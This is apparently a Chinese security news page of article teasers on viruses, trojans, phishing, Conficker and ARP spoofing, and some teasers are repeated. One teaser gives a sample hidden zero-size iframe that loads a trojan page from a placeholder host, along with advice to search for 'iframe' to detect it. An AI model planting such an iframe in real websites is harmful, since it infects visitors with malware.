病毒

Websense的安全研究专家表示，黑客已经威胁了大约4万个合法网站，他们利用恶意的Java脚本感染网站最终诱使用户点击恶意网站。

在病毒、木马肆虐的今天，电脑安全愈发使人关注，就连日常上网查询彩票信息的彩民，也被“黑客”盯上了。根据瑞星“云安全”系统发现，最近一周共拦截了1206万次木马网站对用户的攻击，比上周下降近一半。但是经过监测，很多钓鱼网站都针对彩票做文章，彩民在上网购买彩票或查看中奖信息时要格外注意。

卡巴斯基实验室近期检测到一种名为“VB入侵者”的恶性木马(Trojan.Win32.Inject.aatw)。

常规的HTML挂马方法一般是在网页中插入一条iframe语句，像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂，一般是查找一下关键词iframe。

木马是随计算机或Windows的启动而启动并掌握一定的控制权的，其启动方式可谓多种多样，通过注册表启动、通过System.ini启动、通过某些特定程序启动等，真是防不胜防。其实只要能够遏制住不让它启动，木马就没什么用了，这里就简单说说木马的启动方式，知己知彼百战不殆嘛。

病毒、蠕虫和木马之间的界限越来越模糊，考虑到它们的潜在目的，对它们的理解也越来越容易。通常，病毒通过电子邮件传播，带有一定的有效载荷。蠕虫通过其它渠道，比如IM、SNMP、RSS(现在还没有，不过估计也快了)以及其它的微软协议。蠕虫通常也会带来一定的载荷。它们的目的都是尽可能快地传播。

网页挂马最难的就是传播了，小网站易入侵但是访问人数不多，收获的肉鸡也就不是很多。因此，一种新的挂马方式开始流行——局域网ARP欺骗挂马，只要局域网内一台机子中招了，它就可以在内网传播含有木马的网页，捕获的肉鸡就会成几何增长。

眼下，高校2009届本科毕业生论文答辩工作已陆续启动。大四的小张近日备受毕业论文的“折磨”，临近答辩，一次杀毒后他却发现电脑里储存的万字论文消失了。经金山毒霸反病毒专家诊断发现，原来是伪文件夹U盘病毒在搞鬼。

上网的人中，很少有谁没被病毒侵害过。但在大多数人将注意力放在对付病毒上时，业内权威人士新近指出，现在要想保证上网安全，必须对以下这三种威胁同时设防。第一是以传统宏病毒、蠕虫等为代表的入侵性病毒；第二是以间谍软件、广告软件、网络钓鱼软件、木马程序为代表的扩展类威胁；第三是以黑客为首的有目标的专门攻击或无目标的随意攻击为代表的网络侵害。

在局域网中，通过ARP协议来完成IP地址转换为第二层物理地址（即MAC地址）的。ARP协议对网络安全具有重要的意义。通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞或者实现“man in the middle” 进行ARP重定向和嗅探攻击。

江民今日提醒您注意：在今天的病毒中Worm/Wurmark.b“恶码客”变种b和Trojan/XiaJian.b“瞎箭”变种b值得关注。

网上购物非常活跃，一只看不见的黑手也出现了。许多读者的举报信说中了IE截取器病毒，支付宝账号的资金不翼而飞了。小编随后截获了该病毒的样本，进行了详细的分析，发现它可以截取支付宝插件登录窗口中的账号和密码，严重影响了支付宝的安全。如果中了该病毒，电脑会有以下症状：

江民今日提醒您注意：在今天的病毒中TrojanDropper.Agent.vus“代理木马”变种vus和Trojan/PSW.QQPass.vwe“QQ大盗”变种vwe值得关注。

僵尸网络无休止的肆虐几乎已经是司空见惯，人们只是在思考那些坏家伙是如何在不被用户察觉的情况下，轻而易举的就入侵了用户的计算机。

黑客入侵后要做的事就是上传木马后门，为了能够让上传的木马不被发现，他们会想尽种种方法对其进行伪装。而作为被害者，我们又该如何识破伪装，将系统中的木马统统清除掉呢！

北京时间5月28日消息，据国外媒体报道，著名安全厂商近日发布了题为《网络最危险搜索关键词》的报告，显示网络犯罪分子最渴望攻击的对象不是那些对网络危险缺乏了解的年轻人，而是那些搜索免费赠品的网民。

上网的人中，很少有谁没被病毒侵害过。但在大多数人将注意力放在对付病毒上时，业内权威人士新近指出，现在要想保证上网安全，必须对以下这三种威胁同时设防。第一是以传统宏病毒、蠕虫等为代表的入侵性病毒；第二是以间谍软件、广告软件、网络钓鱼软件、木马程序为代表的扩展类威胁；第三是以黑客为首的有目标的专门攻击或无目标的随意攻击为代表的网络侵害。

卡巴斯基实验室呼吁全球用户警惕一种名为Kido ( 又叫 Conficker 或 Downadup ) 的蠕虫病毒。该蠕虫病毒具有极强的破坏能力，不仅能够创建十分强大的僵尸网络，还可以通过本地网络和可移动存储介质进行传播。经统计，世界上因为被Kido感染而沦为“肉鸡”的计算机数量已经达到了500万至600万之多。

5月26日，360安全中心昨日一共截获最新挂马网址23445个，当日360安全卫士为用户拦截了来自1058499个恶意网址的总共16440908次挂马攻击。在影响比较大的挂马网址数据中,包括了号称“中国最大的法律门户”的“中法网”、法律咨询门户网站“中顾网”以及“徐州市司法行政网”等网站。浏览这些网站的用户如果电脑中存在漏洞，就很可能会被植入恶意木马，从而面临信息数据、虚拟财产被盗的威胁。

黑客入侵后要做的事就是上传木马后门，为了能够让上传的木马不被发现，他们会想尽种种方法对其进行伪装。而作为被害者，我们又该如何识破伪装，将系统中的木马统统清除掉呢！